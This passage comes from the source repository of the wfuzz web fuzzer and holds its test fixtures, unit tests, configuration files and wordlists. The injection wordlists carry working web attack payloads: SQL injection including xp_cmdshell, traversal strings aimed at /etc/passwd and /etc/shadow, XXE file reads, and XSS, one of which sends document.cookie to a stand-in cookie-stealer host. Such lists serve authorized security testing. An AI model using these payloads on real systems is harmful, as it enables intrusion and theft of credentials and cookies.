5 | CMD ["python", "simple_server.py"]
6 |
--------------------------------------------------------------------------------
/tests/server_dir/dir/a:
--------------------------------------------------------------------------------
1 | one two thre
2 | two
3 | three
4 | four
5 |
--------------------------------------------------------------------------------
/tests/server_dir/dir/b:
--------------------------------------------------------------------------------
1 | one
2 | two
3 |
--------------------------------------------------------------------------------
/tests/server_dir/dir/c:
--------------------------------------------------------------------------------
1 | 1 2 3 4 5
2 | 1 2 3
3 | 1 2
4 | 1
5 |
--------------------------------------------------------------------------------
/tests/server_dir/dir/one:
--------------------------------------------------------------------------------
1 | one two thre
2 | two
3 | three
4 | four
5 |
--------------------------------------------------------------------------------
/tests/server_dir/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: '2'
2 | services:
3 | httpserver:
4 | build:
5 | context: .
6 | dockerfile: Dockerfile
7 | ports:
8 | - "8000:8000"
9 | command: python simple_server.py
10 | httpproxy:
11 | image: mitmproxy/mitmproxy
12 | ports:
13 | - "8080:8080"
14 | command: mitmdump
15 | httpbin:
16 | image: kennethreitz/httpbin
17 | ports:
18 | - "9000:80"
19 |
--------------------------------------------------------------------------------
/tests/server_dir/iterators/aa:
--------------------------------------------------------------------------------
1 | 1
2 | 2
3 | 3
4 |
5 |
--------------------------------------------------------------------------------
/tests/server_dir/iterators/ac:
--------------------------------------------------------------------------------
1 | ac
2 | 1
3 | 2
4 |
5 |
--------------------------------------------------------------------------------
/tests/server_dir/iterators/bb:
--------------------------------------------------------------------------------
1 | 4
2 |
3 |
--------------------------------------------------------------------------------
/tests/server_dir/plugins/robots.txt:
--------------------------------------------------------------------------------
1 | user-agent: *
2 | Disallow: /osrun/*
3 | Disallow: /cal_endar/*
4 | Disallow: /crawlsnags/*
5 | Disallow: /static/*
6 | vagrant@vagrant-ubu
7 |
--------------------------------------------------------------------------------
/tests/server_dir/recursive_dir/a/b/c/placeholder.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/tests/server_dir/recursive_dir/a/b/c/placeholder.txt
--------------------------------------------------------------------------------
/tests/server_dir/static/placeholder.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/tests/server_dir/static/placeholder.txt
--------------------------------------------------------------------------------
/tests/test_clparser.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | from wfuzz.ui.console.clparser import CLParser
4 |
5 |
6 | class CLParserTest(unittest.TestCase):
7 | def test_listplugins(self):
8 | with self.assertRaises(SystemExit) as cm:
9 | CLParser(["wfuzz", "-e", "iterators"]).parse_cl()
10 |
11 | self.assertEqual(cm.exception.code, 0)
12 |
13 | def test_ip_option(self):
14 | options = CLParser(["wfuzz", "--ip", "127.0.0.1"]).parse_cl()
15 |
16 | self.assertEqual(options.data["connect_to_ip"]["ip"], "127.0.0.1")
17 | self.assertEqual(options.data["connect_to_ip"]["port"], "80")
18 |
19 | options = CLParser(["wfuzz", "--ip", "127.0.0.1:22"]).parse_cl()
20 |
21 | self.assertEqual(options.data["connect_to_ip"]["ip"], "127.0.0.1")
22 | self.assertEqual(options.data["connect_to_ip"]["port"], "22")
23 |
24 | options = CLParser(["wfuzz", "--ip", "127.0.0.1:"]).parse_cl()
25 |
26 | self.assertEqual(options.data["connect_to_ip"]["ip"], "127.0.0.1")
27 | self.assertEqual(options.data["connect_to_ip"]["port"], "80")
28 |
29 | with self.assertRaises(Exception) as cm:
30 | options = CLParser(["wfuzz", "--ip", ":80"]).parse_cl()
31 | self.assertTrue("An IP must be specified" in str(cm.exception))
32 |
33 | def test_ze_zd_option(self):
34 | with self.assertRaises(Exception) as cm:
35 | options = CLParser(
36 | ["wfuzz", "-z", "range,0-10", "--zD", "0-10", "url"]
37 | ).parse_cl()
38 | self.assertTrue("exclusive" in str(cm.exception))
39 |
40 | options = CLParser(
41 | ["wfuzz", "-z", "range", "--zD", "0-1", "--zE", "md5", "url"]
42 | ).parse_cl()
43 | self.assertEqual(
44 | options.data["payloads"],
45 | [("range", {"default": "0-1", "encoder": ["md5"]}, None)],
46 | )
47 |
48 | options = CLParser(
49 | ["wfuzz", "-z", "range,0-1", "--zE", "md5", "url"]
50 | ).parse_cl()
51 | self.assertEqual(
52 | options.data["payloads"],
53 | [("range", {"default": "0-1", "encoder": ["md5"]}, None)],
54 | )
55 |
56 | options = CLParser(
57 | ["wfuzz", "-z", "range", "--zD", "0-1", "--zE", "md5", "url"]
58 | ).parse_cl()
59 | self.assertEqual(
60 | options.data["payloads"],
61 | [("range", {"default": "0-1", "encoder": ["md5"]}, None)],
62 | )
63 |
64 | options = CLParser(["wfuzz", "-z", "range", "--zD", "0-1"]).parse_cl()
65 | self.assertEqual(
66 | options.data["payloads"],
67 | [("range", {"default": "0-1", "encoder": None}, None)],
68 | )
69 |
70 | options = CLParser(["wfuzz", "-z", "range,0-1"]).parse_cl()
71 | self.assertEqual(
72 | options.data["payloads"],
73 | [("range", {"default": "0-1", "encoder": None}, None)],
74 | )
75 |
--------------------------------------------------------------------------------
/tests/test_filterintro.py:
--------------------------------------------------------------------------------
1 | import unittest
2 |
3 | # Python 2 and 3: urlib.parse
4 |
5 | from wfuzz.fuzzobjects import FuzzResult
6 | from wfuzz.fuzzrequest import FuzzRequest
7 | from wfuzz.filters.ppfilter import FuzzResFilter
8 |
9 |
10 | raw_req = """GET / HTTP/1.1
11 | Host: www.wfuzz.org
12 | User-Agent: curl/7.58.0
13 | Accept: */*
14 | """
15 |
16 | raw_resp = b"""HTTP/1.1 302 Found
17 | Content-Type: text/html; charset=utf-8
18 | Content-Language: en
19 | Location: https://wfuzz.readthedocs.io/en/latest/
20 | Vary: Accept-Language, Cookie
21 | Server: nginx/1.14.0 (Ubuntu)
22 | X-Fallback: True
23 | X-Served: Django
24 | X-Deity: web01
25 | Date: Wed, 23 Jan 2019 21:43:59 GMT
26 | Content-Length: 0
27 | """
28 |
29 |
30 | class FilterTest(unittest.TestCase):
31 | def __init__(self, *args, **kwargs):
32 | super(FilterTest, self).__init__(*args, **kwargs)
33 | self.maxDiff = 1000
34 |
35 | def get_filtered_fuzzrequest(self, filter_str):
36 | fr = FuzzRequest()
37 | fr.update_from_raw_http(raw_req, "http", raw_resp, b"")
38 |
39 | fuzz_res = FuzzResult(history=fr)
40 |
41 | ffilter = FuzzResFilter(filter_string=filter_str)
42 | ffilter.is_visible(fuzz_res)
43 |
44 | return fuzz_res
45 |
46 | def test_nonexisting(self):
47 | fr = FuzzRequest()
48 | fr.url = "http://www.wfuzz.org/path?param=1¶m2=2"
49 |
50 | fuzz_res = FuzzResult(history=fr)
51 |
52 | with self.assertRaises(Exception) as context:
53 | ffilter = FuzzResFilter(filter_string="url=-'test'")
54 | ffilter.is_visible(fuzz_res)
55 | self.assertTrue("rsetattr: Can't set" in str(context.exception))
56 |
57 | with self.assertRaises(Exception) as context:
58 | ffilter = FuzzResFilter(filter_string="notthere=-'test'")
59 | ffilter.is_visible(fuzz_res)
60 | self.assertTrue("rgetattr: Can't get" in str(context.exception))
61 |
62 | with self.assertRaises(Exception) as context:
63 | ffilter = FuzzResFilter(filter_string="r.params.get.notthere=-'test'")
64 | ffilter.is_visible(fuzz_res)
65 | self.assertTrue("DotDict: Non-existing field" in str(context.exception))
66 |
--------------------------------------------------------------------------------
/tox.ini:
--------------------------------------------------------------------------------
1 | [tox]
2 | envlist = begin,docker,py38,end
3 |
4 | [testenv]
5 | allowlist_externals = make
6 | commands =
7 | make flake8
8 | coverage run --append -m pytest -v -s tests/
9 | deps =
10 | .[dev]
11 |
12 | [testenv:docker]
13 | allowlist_externals = docker-compose
14 | changedir = tests
15 | commands = docker-compose -f server_dir/docker-compose.yml up -d
16 |
17 | [testenv:begin]
18 | commands = coverage erase
19 | deps = coverage
20 |
21 | [testenv:end]
22 | allowlist_externals = make
23 | commands = make coverage
24 | deps = coverage
25 |
26 | [testenv:codecov]
27 | passenv = CI TRAVIS TRAVIS_*
28 | deps = codecov
29 | commands = codecov
30 |
--------------------------------------------------------------------------------
/wfencode:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | python src/wfencode.py "$@"
3 |
--------------------------------------------------------------------------------
/wfencode.bat:
--------------------------------------------------------------------------------
1 | call python src\wfencode.py %*
2 |
--------------------------------------------------------------------------------
/wfpayload:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | python src/wfpayload.py "$@"
3 |
--------------------------------------------------------------------------------
/wfpayload.bat:
--------------------------------------------------------------------------------
1 | call python src\wfpayload.py %*
2 |
--------------------------------------------------------------------------------
/wfuzz:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | python src/wfuzz-cli.py "$@"
3 |
--------------------------------------------------------------------------------
/wfuzz.bat:
--------------------------------------------------------------------------------
1 | call python src\wfuzz-cli.py %*
2 |
--------------------------------------------------------------------------------
/wfuzz_bash_completion:
--------------------------------------------------------------------------------
1 | # wfuzz bash completion file
2 | # by Xavier Mendez (xavi.mendez@gmail.com) aka Javi
3 |
4 | _wfuzz() {
5 |
6 | COMPREPLY=()
7 | local cur prev
8 | cur=${COMP_WORDS[COMP_CWORD]}
9 | prev=${COMP_WORDS[COMP_CWORD-1]}
10 | WFUZZ_EX="wfuzz"
11 |
12 | # Change to your wordlists' base directory
13 | WLDIR=$($WFUZZ_EX --ee files)
14 |
15 | common_options="-z[PAYLOAD] --zD[DEFAULT] --zE[ENCODERS] --hc[HIDE_HTTP_CODES] -d[POST_DATA] "
16 |
17 | case "$prev" in
18 | -u)
19 | COMPREPLY=( $( compgen -W "http https" -- $cur ) )
20 | ;;
21 | -w)
22 | COMPREPLY=( $(compgen -W "$(find $WLDIR -type f -iname "*.txt")" -- $cur) )
23 | ;;
24 | -w)
25 | COMPREPLY=( $(compgen -W "$(find $WLDIR -type f -iname "*.txt")" -- $cur) )
26 | ;;
27 | -z)
28 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee payloads)" -- $cur))
29 | ;;
30 | -e)
31 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee registrants)" -- $cur))
32 | ;;
33 | -m)
34 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee iterators)" -- $cur))
35 | ;;
36 | -o)
37 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee printers)" -- $cur))
38 | ;;
39 | --script-help)
40 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee scripts)" -- $cur))
41 | ;;
42 | --script)
43 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee scripts)" -- $cur))
44 | ;;
45 | --field)
46 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee fields)" -- $cur))
47 | ;;
48 | --zE)
49 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee encoders)" -- $cur))
50 | ;;
51 | -V)
52 | COMPREPLY=( $( compgen -W "allvars allpost allheaders" -- $cur ) )
53 | ;;
54 | -X)
55 | COMPREPLY=( $( compgen -W "FUZZ OPTIONS PUT DELETE POST GET TRACE CONNECT HEAD" -- $cur ) )
56 | ;;
57 | --hc)
58 | COMPREPLY=( $( compgen -W "400 401 301 302 500 404 200" -- $cur ) )
59 | ;;
60 | *)
61 | COMPREPLY=($(compgen -W "$($WFUZZ_EX --ee options)" -- $cur))
62 | ;;
63 | esac
64 | }
65 |
66 | complete -F _wfuzz -o default wfuzz
67 |
--------------------------------------------------------------------------------
/wordlist/Injections/SQL.txt:
--------------------------------------------------------------------------------
1 | '
2 | "
3 | #
4 | -
5 | --
6 | '%20--
7 | --';
8 | '%20;
9 | =%20'
10 | =%20;
11 | =%20--
12 | \x23
13 | \x27
14 | \x3D%20\x3B'
15 | \x3D%20\x27
16 | \x27\x4F\x52 SELECT *
17 | \x27\x6F\x72 SELECT *
18 | 'or%20select *
19 | admin'--
20 | <>"'%;)(&+
21 | '%20or%20''='
22 | '%20or%20'x'='x
23 | "%20or%20"x"="x
24 | ')%20or%20('x'='x
25 | 0 or 1=1
26 | ' or 0=0 --
27 | " or 0=0 --
28 | or 0=0 --
29 | ' or 0=0 #
30 | " or 0=0 #
31 | or 0=0 #
32 | ' or 1=1--
33 | " or 1=1--
34 | ' or '1'='1'--
35 | "' or 1 --'"
36 | or 1=1--
37 | or%201=1
38 | or%201=1 --
39 | ' or 1=1 or ''='
40 | " or 1=1 or ""="
41 | ' or a=a--
42 | " or "a"="a
43 | ') or ('a'='a
44 | ") or ("a"="a
45 | hi" or "a"="a
46 | hi" or 1=1 --
47 | hi' or 1=1 --
48 | hi' or 'a'='a
49 | hi') or ('a'='a
50 | hi") or ("a"="a
51 | 'hi' or 'x'='x';
52 | @variable
53 | ,@variable
54 | PRINT
55 | PRINT @@variable
56 | select
57 | insert
58 | as
59 | or
60 | procedure
61 | limit
62 | order by
63 | asc
64 | desc
65 | delete
66 | update
67 | distinct
68 | having
69 | truncate
70 | replace
71 | like
72 | handler
73 | bfilename
74 | ' or username like '%
75 | ' or uname like '%
76 | ' or userid like '%
77 | ' or uid like '%
78 | ' or user like '%
79 | exec xp
80 | exec sp
81 | '; exec master..xp_cmdshell
82 | '; exec xp_regread
83 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
84 | --sp_password
85 | \x27UNION SELECT
86 | ' UNION SELECT
87 | ' UNION ALL SELECT
88 | ' or (EXISTS)
89 | ' (select top 1
90 | '||UTL_HTTP.REQUEST
91 | 1;SELECT%20*
92 | to_timestamp_tz
93 | tz_offset
94 | <>"'%;)(&+
95 | '%20or%201=1
96 | %27%20or%201=1
97 | %20$(sleep%2050)
98 | %20'sleep%2050'
99 | char%4039%41%2b%40SELECT
100 | '%20OR
101 | 'sqlattempt1
102 | (sqlattempt2)
103 | |
104 | %7C
105 | *|
106 | %2A%7C
107 | *(|(mail=*))
108 | %2A%28%7C%28mail%3D%2A%29%29
109 | *(|(objectclass=*))
110 | %2A%28%7C%28objectclass%3D%2A%29%29
111 | (
112 | %28
113 | )
114 | %29
115 | &
116 | %26
117 | !
118 | %21
119 | ' or 1=1 or ''='
120 | ' or ''='
121 | x' or 1=1 or 'x'='y
122 | /
123 | //
124 | //*
125 | */*
126 |
--------------------------------------------------------------------------------
/wordlist/Injections/Traversal.txt:
--------------------------------------------------------------------------------
1 | ../../../../../../../../../../../../etc/hosts%00
2 | ../../../../../../../../../../../../etc/hosts
3 | ../../boot.ini
4 | /../../../../../../../../%2A
5 | ../../../../../../../../../../../../etc/passwd%00
6 | ../../../../../../../../../../../../etc/passwd
7 | ../../../../../../../../../../../../etc/shadow%00
8 | ../../../../../../../../../../../../etc/shadow
9 | /../../../../../../../../../../etc/passwd^^
10 | /../../../../../../../../../../etc/shadow^^
11 | /../../../../../../../../../../etc/passwd
12 | /../../../../../../../../../../etc/shadow
13 | /./././././././././././etc/passwd
14 | /./././././././././././etc/shadow
15 | \..\..\..\..\..\..\..\..\..\..\etc\passwd
16 | \..\..\..\..\..\..\..\..\..\..\etc\shadow
17 | ..\..\..\..\..\..\..\..\..\..\etc\passwd
18 | ..\..\..\..\..\..\..\..\..\..\etc\shadow
19 | /..\../..\../..\../..\../..\../..\../etc/passwd
20 | /..\../..\../..\../..\../..\../..\../etc/shadow
21 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
22 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
23 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00
24 | \..\..\..\..\..\..\..\..\..\..\etc\shadow%00
25 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00
26 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00
27 | %0a/bin/cat%20/etc/passwd
28 | %0a/bin/cat%20/etc/shadow
29 | %00/etc/passwd%00
30 | %00/etc/shadow%00
31 | %00../../../../../../etc/passwd
32 | %00../../../../../../etc/shadow
33 | /../../../../../../../../../../../etc/passwd%00.jpg
34 | /../../../../../../../../../../../etc/passwd%00.html
35 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
36 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
37 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
38 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
39 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
40 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
41 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
42 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
43 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
44 | \\'/bin/cat%20/etc/passwd\\'
45 | \\'/bin/cat%20/etc/shadow\\'
46 | ../../../../../../../../conf/server.xml
47 | /../../../../../../../../bin/id|
48 | C:/inetpub/wwwroot/global.asa
49 | C:\inetpub\wwwroot\global.asa
50 | C:/boot.ini
51 | C:\boot.ini
52 | ../../../../../../../../../../../../localstart.asp%00
53 | ../../../../../../../../../../../../localstart.asp
54 | ../../../../../../../../../../../../boot.ini%00
55 | ../../../../../../../../../../../../boot.ini
56 | /./././././././././././boot.ini
57 | /../../../../../../../../../../../boot.ini%00
58 | /../../../../../../../../../../../boot.ini
59 | /..\../..\../..\../..\../..\../..\../boot.ini
60 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
61 | \..\..\..\..\..\..\..\..\..\..\boot.ini
62 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00
63 | ..\..\..\..\..\..\..\..\..\..\boot.ini
64 | /../../../../../../../../../../../boot.ini%00.html
65 | /../../../../../../../../../../../boot.ini%00.jpg
66 | /.../.../.../.../.../
67 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
68 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
--------------------------------------------------------------------------------
/wordlist/Injections/XML.txt:
--------------------------------------------------------------------------------
1 | count(/child::node())
2 | x' or name()='username' or 'x'='y
3 | <name>','')); phpinfo(); exit;/*</name>
4 | <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
5 | <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
6 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
7 | <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
8 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
9 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
10 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
11 | <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
12 | <xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
13 | <xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
14 | <xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
15 | <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
16 |
--------------------------------------------------------------------------------
/wordlist/Injections/XSS.txt:
--------------------------------------------------------------------------------
1 | "><script>"
2 | <script>alert("WXSS")</script>
3 | <<script>alert("WXSS");//<</script>
4 | <script>alert(document.cookie)</script>
5 | '><script>alert(document.cookie)</script>
6 | '><script>alert(document.cookie);</script>
7 | \";alert('XSS');//
8 | %3cscript%3ealert("WXSS");%3c/script%3e
9 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e
10 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
11 | <script>alert(document.cookie);</script>
12 | <script>alert(document.cookie);<script>alert
13 | <xss><script>alert('WXSS')</script></vulnerable>
14 | <IMG%20SRC='javascript:alert(document.cookie)'>
15 | <IMG%20SRC="javascript:alert('WXSS');">
16 | <IMG%20SRC="javascript:alert('WXSS')"
17 | <IMG%20SRC=javascript:alert('WXSS')>
18 | <IMG%20SRC=JaVaScRiPt:alert('WXSS')>
19 | <IMG%20SRC=javascript:alert("WXSS")>
20 | <IMG%20SRC=`javascript:alert("'WXSS'")`>
21 | <IMG%20"""><SCRIPT>alert("WXSS")</SCRIPT>">
22 | <IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
23 | <IMG%20SRC='javasc ript:alert(document.cookie)'>
24 | <IMG%20SRC="jav ascript:alert('WXSS');">
25 | <IMG%20SRC="jav ascript:alert('WXSS');">
26 | <IMG%20SRC="jav
ascript:alert('WXSS');">
27 | <IMG%20SRC="jav
ascript:alert('WXSS');">
28 | <IMG%20SRC="%20�%20javascript:alert('WXSS');">
29 | <IMG%20DYNSRC="javascript:alert('WXSS')">
30 | <IMG%20LOWSRC="javascript:alert('WXSS')">
31 | <IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
32 | <IMG%20SRC=javascript:alert('XSS')>
33 | <IMG%20SRC=javascript:alert('XSS')>
34 | <IMG%20SRC=javascript:alert('XSS')>
35 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
36 | "><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
37 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
38 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
39 | '';!--"<XSS>=&{()}
40 |
--------------------------------------------------------------------------------
/wordlist/Injections/bad_chars.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/wordlist/Injections/bad_chars.txt
--------------------------------------------------------------------------------
/wordlist/general/admin-panels.txt:
--------------------------------------------------------------------------------
1 | account.html
2 | account.php
3 | adm/
4 | adm/admloginuser.php
5 | adm_auth.php
6 | adm.html
7 | admin/
8 | admin2/index.php
9 | admin2/login.php
10 | admin2.php
11 | admin/account.html
12 | admin/account.php
13 | admin/admin.html
14 | admin/admin_login.html
15 | admin/admin-login.html
16 | admin/adminLogin.html
17 | admin/admin_login.php
18 | admin/admin-login.php
19 | admin/adminLogin.php
20 | admin/admin.php
21 | admin_area/
22 | adminarea/
23 | admin_area/admin.html
24 | adminarea/admin.html
25 | admin_area/admin.php
26 | adminarea/admin.php
27 | admin_area/index.html
28 | adminarea/index.html
29 | admin_area/index.php
30 | adminarea/index.php
31 | admin_area/login.html
32 | adminarea/login.html
33 | admin_area/login.php
34 | adminarea/login.php
35 | admincontrol.html
36 | admincontrol/login.html
37 | admincontrol/login.php
38 | admin/controlpanel.html
39 | admin/controlpanel.php
40 | admincontrol.php
41 | admin/cp.html
42 | admincp/index.asp
43 | admincp/index.html
44 | admincp/login.asp
45 | admin/cp.php
46 | adm/index.html
47 | adm/index.php
48 | admin/home.html
49 | admin/home.php
50 | admin.html
51 | admin/index.html
52 | admin/index.php
53 | administrator/
54 | administrator/account.html
55 | administrator/account.php
56 | administrator.html
57 | administrator/index.html
58 | administrator/index.php
59 | administratorlogin/
60 | administrator/login.html
61 | administrator/login.php
62 | administrator.php
63 | adminLogin/
64 | admin_login.html
65 | admin-login.html
66 | admin/login.html
67 | adminLogin.html
68 | admin_login.php
69 | admin-login.php
70 | admin/login.php
71 | adminLogin.php
72 | adminpanel.html
73 | adminpanel.php
74 | admin.php
75 | admloginuser.php
76 | adm.php
77 | affiliate.php
78 | bb-admin/
79 | bb-admin/admin.html
80 | bb-admin/admin.php
81 | bb-admin/index.html
82 | bb-admin/index.php
83 | bb-admin/login.html
84 | bb-admin/login.php
85 | controlpanel.html
86 | controlpanel.php
87 | cp.html
88 | cp.php
89 | home.html
90 | home.php
91 | instadmin/
92 | joomla/administrator
93 | login.html
94 | login.php
95 | memberadmin/
96 | modelsearch/admin.html
97 | modelsearch/admin.php
98 | modelsearch/index.html
99 | modelsearch/index.php
100 | modelsearch/login.html
101 | modelsearch/login.php
102 | moderator/
103 | moderator/admin.html
104 | moderator/admin.php
105 | moderator.html
106 | moderator/login.html
107 | moderator/login.php
108 | moderator.php
109 | nsw/admin/login.php
110 | pages/admin/admin-login.html
111 | pages/admin/admin-login.php
112 | panel-administracion/
113 | panel-administracion/admin.html
114 | panel-administracion/admin.php
115 | panel-administracion/index.html
116 | panel-administracion/index.php
117 | panel-administracion/login.html
118 | panel-administracion/login.php
119 | rcjakar/admin/login.php
120 | siteadmin/index.php
121 | siteadmin/login.html
122 | siteadmin/login.php
123 | user.html
124 | user.php
125 | webadmin/
126 | webadmin/admin.html
127 | webadmin/admin.php
128 | webadmin.html
129 | webadmin/index.html
130 | webadmin/index.php
131 | webadmin/login.html
132 | webadmin/login.php
133 | webadmin.php
134 | wp-login.php
135 |
--------------------------------------------------------------------------------
/wordlist/general/big.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/wordlist/general/big.txt
--------------------------------------------------------------------------------
/wordlist/general/catala.txt:
--------------------------------------------------------------------------------
1 | acces
2 | activitats
3 | administracio
4 | afegir
5 | agafar
6 | agenda
7 | ajuda
8 | ajudes
9 | antic
10 | arrel
11 | article
12 | articles
13 | arxiu
14 | arxius
15 | borsa
16 | botiga
17 | bulleti
18 | bustia
19 | calaix
20 | campanyes
21 | capsalera
22 | carpeta
23 | cat
24 | catala
25 | cataleg
26 | catalegs
27 | categories
28 | celler
29 | cerca
30 | cercador
31 | claus
32 | client
33 | clients
34 | colleccio
35 | comunicacio
36 | confirmacio
37 | contingut
38 | continguts
39 | copia
40 | correu
41 | crida
42 | dades
43 | demamar
44 | demanas
45 | descarrega
46 | descarregues
47 | desenvolupament
48 | directori
49 | disseny
50 | document
51 | documentacio
52 | documents
53 | eines
54 | empreses
55 | enllacos
56 | entitats
57 | entorns
58 | esborrar
59 | escola
60 | externes
61 | finestra
62 | fitxer
63 | fitxers
64 | fonts
65 | formulari
66 | formularis
67 | forum
68 | forums
69 | gestio
70 | glossari
71 | historic
72 | imatge
73 | imatges
74 | informacio
75 | inici
76 | jocs
77 | lletres
78 | lleure
79 | llibres
80 | llista
81 | localitzador
82 | locals
83 | maquinari
84 | mitjans
85 | mostra
86 | mostres
87 | mot
88 | noticies
89 | nou
90 | novetats
91 | nul
92 | obrir
93 | operacio
94 | organitzacions
95 | pagines
96 | pas
97 | personals
98 | pestanya
99 | pestanyes
100 | peu
101 | porta
102 | primer
103 | principal
104 | privat
105 | programari
106 | projecte
107 | projectes
108 | prova
109 | proves
110 | public
111 | publicacions
112 | pujar
113 | recerca
114 | recull
115 | reculls
116 | registre
117 | registres
118 | salo
119 | seccio
120 | segon
121 | seguretat
122 | serveis
123 | sistemes
124 | sumari
125 | sumaris
126 | tasques
127 | taula
128 | tauler
129 | tecnic
130 | temes
131 | tercer
132 | titulars
133 | tot
134 | totes
135 | tots
136 | transit
137 | transmissio
138 | treballador
139 | treballadors
140 | usuari
141 | usuaris
142 | vell
143 | veure
144 |
--------------------------------------------------------------------------------
/wordlist/general/euskera.txt:
--------------------------------------------------------------------------------
1 | administrazio
2 | administrazioa
3 | argitalpenak
4 | artxiboa
5 | ataria
6 | aupa
7 | aurrera
8 | bai
9 | berri
10 | bidali
11 | bilatu
12 | buzoia
13 | dataz
14 | dokumentuak
15 | egutegia
16 | erreala
17 | ez
18 | fitxategia
19 | foru
20 | gestio
21 | gidak
22 | gora
23 | hasi
24 | hizkuntza
25 | ikusi
26 | informazio
27 | loturak
28 | makusi
29 | mezuak
30 | oharra
31 | proiektua
32 | saioa
33 | sustapena
34 | taula
35 | txostena
36 |
